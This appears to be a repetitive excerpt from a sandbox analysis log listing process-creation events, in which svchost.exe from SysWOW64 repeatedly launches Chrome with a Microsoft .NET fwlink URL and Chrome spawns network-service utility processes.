                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1976,i,5375429189451205296,3038177405675182667,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2028 --field-trial-handle=1980,i,8051270230576347227,15887782478097552568,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1988,i,5804494753339918936,5217131698543492645,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1136,i,1930181798274664567,3542273984303113262,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1968 --field-trial-handle=1668,i,10836949039064754798,10619019416050471488,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1972,i,17733880235770984801,5447189613793920795,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1480 --field-trial-handle=1984,i,120110399101443424,9941541229011483260,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=852 --field-trial-handle=1972,i,16836352753448976889,2601815521256357393,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1980 --field-trial-handle=1884,i,7301673669103937254,12836756404783810427,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2116 --field-trial-handle=1940,i,12539128067224901217,8991374413711119156,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2120 --field-trial-handle=2000,i,15628247129644466505,3875143643089187018,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1976 --field-trial-handle=1924,i,6482886242108065281,4105261451375631266,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=2012,i,2947015941692405239,17280289242752989468,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2140 --field-trial-handle=1972,i,17200434405895777880,14925594255065276775,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1600 --field-trial-handle=1980,i,13945759412545287249,4073186008645904870,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1480 --field-trial-handle=1984,i,120110399101443424,9941541229011483260,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1988,i,15807299402186397352,10536807858062258795,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1996,i,1442060403194708727,17590615368937411025,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2108 --field-trial-handle=1992,i,14774167980353239420,17590433410553186815,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1204 --field-trial-handle=1964,i,9634848512687327071,160386830931210519,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1956 --field-trial-handle=1992,i,15123479563739650555,17542146906633038749,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1596 --field-trial-handle=2032,i,2098739127948043686,10317841462462024608,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1972,i,8929845415192330188,781615668034862370,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2000 --field-trial-handle=1960,i,9677392010693155346,11350815433485431755,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1968,i,10908976342037239078,6657148638705883583,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1980,i,15324472771725808384,11056097287078458784,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2024 --field-trial-handle=1972,i,1428648053043398560,3532581574471474972,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1984,i,3981841079913460613,3962020599342444513,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
